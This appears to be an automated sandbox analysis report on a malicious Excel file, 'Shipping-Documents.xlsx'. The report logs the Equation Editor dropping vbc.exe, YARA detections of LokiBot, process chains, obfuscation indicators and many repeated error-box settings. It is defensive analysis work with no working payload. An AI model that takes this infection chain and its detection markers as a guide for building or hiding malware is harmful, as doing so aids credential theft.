              Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 4.2.vbc.exe.355d638.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 4.2.vbc.exe.355d638.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Office equation editor drops PE fileShow sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exeJump to dropped file
              Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
              Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
              Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
              Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
              Source: C:\Users\Public\vbc.exeCode function: 4_2_002E90E1
              Source: C:\Users\Public\vbc.exeCode function: 4_2_002EC3D0
              Source: C:\Users\Public\vbc.exeCode function: 4_2_002EBB78
              Source: C:\Users\Public\vbc.exeCode function: 4_2_002EDDA8
              Source: C:\Users\Public\vbc.exeCode function: 4_2_002ECE76
              Source: C:\Users\Public\vbc.exeCode function: 4_2_002E555A
              Source: C:\Users\Public\vbc.exeCode function: 4_2_002EF8D8
              Source: C:\Users\Public\vbc.exeCode function: 4_2_002EBA83
              Source: C:\Users\Public\vbc.exeCode function: 4_2_002EBAD0
              Source: C:\Users\Public\vbc.exeCode function: 4_2_002EED48
              Source: C:\Users\Public\vbc.exeCode function: 4_2_002E2D80
              Source: C:\Users\Public\vbc.exeCode function: 4_2_002E4F60
              Source: C:\Users\Public\vbc.exeCode function: 4_2_002EAFB2
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00615819
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00610048
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00615CE0
              Source: C:\Users\Public\vbc.exeCode function: 4_2_006148C4
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00616080
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00610548
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00610538
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00610270
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00616650
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00613658
              Source: C:\Users\Public\vbc.exeCode function: 4_2_006112A8
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00610280
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00610728
              Source: C:\Users\Public\vbc.exeCode function: 5_2_0040549C
              Source: C:\Users\Public\vbc.exeCode function: 5_2_004029D4
              Source: Shipping-Documents.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
              Source: C:\Users\Public\vbc.exeCode function: String function: 0041219C appears 45 times
              Source: C:\Users\Public\vbc.exeCode function: String function: 00405B6F appears 42 times
              Source: C:\Users\Public\vbc.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
              Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 4.2.vbc.exe.355d638.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 4.2.vbc.exe.355d638.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 4.2.vbc.exe.355d638.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: regasm[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: regasm[1].exe.2.dr, MediaManager/DebuggableAttribute.csCryptographic APIs: 'CreateDecryptor'
              Source: regasm[1].exe.2.dr, MediaManager/DebuggableAttribute.csCryptographic APIs: 'TransformFinalBlock'
              Source: 4.2.vbc.exe.d00000.3.unpack, MediaManager/DebuggableAttribute.csCryptographic APIs: 'CreateDecryptor'
              Source: 4.2.vbc.exe.d00000.3.unpack, MediaManager/DebuggableAttribute.csCryptographic APIs: 'TransformFinalBlock'
              Source: 4.0.vbc.exe.d00000.0.unpack, MediaManager/DebuggableAttribute.csCryptographic APIs: 'CreateDecryptor'
              Source: 4.0.vbc.exe.d00000.0.unpack, MediaManager/DebuggableAttribute.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.2.vbc.exe.d00000.1.unpack, MediaManager/DebuggableAttribute.csCryptographic APIs: 'CreateDecryptor'
              Source: 5.2.vbc.exe.d00000.1.unpack, MediaManager/DebuggableAttribute.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.0.vbc.exe.d00000.0.unpack, MediaManager/DebuggableAttribute.csCryptographic APIs: 'CreateDecryptor'
              Source: 5.0.vbc.exe.d00000.0.unpack, MediaManager/DebuggableAttribute.csCryptographic APIs: 'TransformFinalBlock'
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@6/20@0/2
              Source: C:\Users\Public\vbc.exeCode function: 5_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
              Source: C:\Users\Public\vbc.exeCode function: 5_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Shipping-Documents.xlsxJump to behavior
              Source: C:\Users\Public\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRFAD2.tmpJump to behavior
              Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
              Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
              Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
              Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
              Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
              Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
              Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
              Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
              Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
              Source: Shipping-Documents.xlsxVirustotal: Detection: 40%
              Source: Shipping-Documents.xlsxReversingLabs: Detection: 31%
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
              Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
              Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
              Source: Shipping-Documents.xlsxStatic file information: File size 1359872 > 1048576
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: Binary string: StringBuilderCache.pdb source: vbc.exe, vbc.exe.2.dr
              Source: Shipping-Documents.xlsxInitial sample: OLE indicators vbamacros = False
              Source: Shipping-Documents.xlsxInitial sample: OLE indicators encrypted = True

              Data Obfuscation:

              barindex
              Yara detected aPLib compressed binaryShow sources
              Source: Yara matchFile source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2856, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 3052, type: MEMORY
              Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.355d638.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPE
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00D03CE4 push es; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00D03BE1 push es; retn 0000h
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0061885F push esp; retf 0017h
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00612433 pushad ; retf
              Source: C:\Users\Public\vbc.exeCode function: 4_2_006120C2 push ss; iretd
              Source: C:\Users\Public\vbc.exeCode function: 4_2_006120CC push ss; iretd
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0061318B push ebp; retf
              Source: C:\Users\Public\vbc.exeCode function: 4_2_006162FD push es; retf
              Source: C:\Users\Public\vbc.exeCode function: 4_2_006147A5 push eax; retf 0017h
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00402AC0 push eax; ret
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00402AC0 push eax; ret
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00D03CE4 push es; ret
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00D03BE1 push es; retn 0000h
              Source: initial sampleStatic PE information: section name: .text entropy: 7.61248422498
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

              Boot Survival:

              barindex
              Drops PE files to the user root directoryShow sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
